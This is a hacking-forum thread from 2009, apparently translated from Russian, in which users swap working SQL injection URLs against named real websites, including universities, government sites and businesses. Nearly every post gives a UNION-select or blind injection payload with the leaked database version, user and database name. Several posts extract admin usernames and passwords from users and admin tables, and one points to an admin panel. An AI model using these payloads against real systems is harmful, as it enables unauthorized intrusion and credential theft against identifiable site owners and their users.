SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Rubaka

    http://bender.samaratoday.ru/webpage.php?id=19+version()+LIMIT+1,1

    Database Version: 5.1.38
    Database name: samaratoda_ben
    User name: samaratoda_ben@localhost

    There is a table users:username,passwrd
     
    4 people like this.
  2. SanHuan

    Code:
    http://www.artgamma.ru/news.php?id=-191+union+select+1,version%28%29,@@version_compile_os,4,database%28%29,6,7,8,9,10,11,12,13,14,15
     
    6 people like this.
  3. Swift

    http://www.bridesathotbobbins.co.uk/?pageid=1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables

    http://www.casauna.se/showimages.php?mode=left&propertyID=1+union+select+concat(0x3a,version(),user(),database())/*

    5.0.32-Debian_7etch11casauna@localhostCasauna
     
    4 people like this.
  4. [x60]unu

    http://www.retronintendo.net/game.php?id=1/**/aNd/**/substring(version(),1,1)=5
    Branch - 5

    ***

    http://www.feelies.org/game.php?id=1/**/aNd/**/substring(version(),1,1)=3
    branch - 5

    ***
     
    #10724 [x60]unu, 26 Sep 2009
    Last edited: 27 Sep 2009
    10 people like this.
  5. edge911

    http://www.energieagentur.nrw.de/_infopool/page.asp?InfoID=486+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--

    [mysqld-5.0.45-community-nt-log


    PR6
     
    5 people like this.
  6. heretic1990

    Code:
    http://www.atomicforce.info/News.php?ID=1+union+all+select+1,version(),3,4,5'
    
    http://www.personnelmanagement.co.uk/main/news.php?id=1+and+1=2+union+all+select+1,2,concat(user_login,char(58),user_password,char(58),user_email),4,5,6,7,8,9,10,11+from+cms_users--'
    
    http://www.yarochester.info/news.php?id=1+union+all+select+1,2,3,4,version(),6'
    
    http://www.wellfield-stud.co.uk/read-news.php?id=1+and+1=2+union+all+select+1,concat(username,char(58),password),3,4+from+%E2%80%8Badlogger_users--'
    
    http://www.filmorder.ir/news.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables'
    
    http://lescompagnonsdelafuste.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10'
    
    http://www.film118.ir/news.php?id=-1+union+select+1,2,3,concat(user,char(58),pass),5+from+user'
    
    http://www.kadinonline.com/news.php?id=1-1+UNION+SELECT+0x65727230722d31--'
    :eek:
     
    #10726 heretic1990, 26 Sep 2009
    Last edited by a moderator: 26 Sep 2009
    6 people like this.
  7. hackmon

    http://www.pdamarket.ru/show_cat2.php?grid=-46+union+select+concat_ws%28char%2858%29,username,password%29+from+admin

    http://www.shindaiwa.ru/show_cat2.php?grid=-5+union+select+concat_ws(char(58),username,password)+from+admin
     
    #10727 hackmon, 26 Sep 2009
    Last edited: 26 Sep 2009
    4 people like this.
  8. HAXTA4OK

    That killed me

    Useful articles on cracking and hacking

    http://bestxaksoft.ru/article_view.php?id=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5/*

    jorikirudik@localhost:h3736_jorikvartanoff:4.1.20-log
     
    #10728 HAXTA4OK, 26 Sep 2009
    Last edited: 26 Sep 2009
    4 people like this.
  9. .:[melkiy]:.

    [PR 8] [TIC 600]
    Code:
    http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5--
     
    8 people like this.
  10. Shadrin

    Code:
    http://www.khartoum-ppu.gov.sd/law_d.php?id=-5+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5--
    felamedc_plan@localhost : felamedc_ppu : 5.0.81-community-log
     
    2 people like this.
  11. HAXTA4OK

    It looks like you can order the Hacker magazine here =) for 70 c.u. (conventional units), I think

    http://www.rustv.de/club/shop/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16--

    rustv@localhost:5.0.51b-community:db25865
     
    2 people like this.
  12. Swift

    PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
     
    2 people like this.
  13. DezMond™

    http://www.cse.salford.ac.uk/news.php?newsID=-226'+union+select+1,2,concat_ws(0x3a3a,username,password),6,5,6,7,8,9,10,11+from+users+/*+

    PR6
    http://www.avalonmedical.co.uk/showjob.php?id=-68'+union+select+1,2,3,concat_ws(0x3a3a,id,username,pwd),5,6,7,8,9+from+users+limit+2,1+/*+

    http://www.jobsintimmins.com/showjob.php?id=-254'+uNioN+seLeCt+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+--+


    http://www.infoserbia.com/jobs/sr/showjob.php?id=429&cid=-443'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+/*+
     
    5 people like this.
  14. Shadrin

    PR5
    Code:
    http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10--
    jp000297@localhost : jp000297 : 5.0.67
     
    4 people like this.
  15. edge911

    4.1.22:mensaint_main:mensaint_user@localhost

    PR7
     
    #10735 edge911, 27 Sep 2009
    Last edited: 27 Sep 2009
    4 people like this.
  16. Skofield

    Code:
    http://www.dynamicchiropractic.com/mpacms/dc/article.php?id=-53798+union+select+1,2,3,4,5,6,7,8,9,0,1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,30/*
    -----------------------------------------------------------------------------------------

    PR 6
    http://performingarts.nd.edu/index.php?page=detail&event=-1094+union+select+1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,42+from+mysql.user/*

    Database Version: 4.0.25-standard
    Database name: dpac
    User name: dpac@localhost
     
    #10736 Skofield, 27 Sep 2009
    Last edited: 27 Sep 2009
    6 people like this.
  17. kair

    Sorry, I couldn't view the off-topic

    Govnomania
    http://www.govnomania.ru/admin

    Code:
    http://www.govnomania.ru/index.php?sbjoke_id=-1+union+select+0,1,2,3,%20concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
    the admin panel is in the same place
     
    4 people like this.
  18. Swift


    5.0.51a-24+lenny1elu@10.10.200.1project_management
     
    5 people like this.
  19. hackmon

    http://www.lankahub.com/category.php?IndustryID=2+union+select+1,2,concat_ws(0x3a,loginid,password)+from+admin--
     
    1 person likes this.
  20. [x60]unu

    http://codim.org.il - PR=3

    http://codim.org.il/game.php?id=1/**/anD/**/1=2/**/uniON/**/aLl/**/seLEcT/**/1,2,3,version()

    Version = 5.0.67-userstats-log
    User = codim@piratecity.com
    Database = codim1

    3 tables
    games
    links
    system
     
    3 people like this.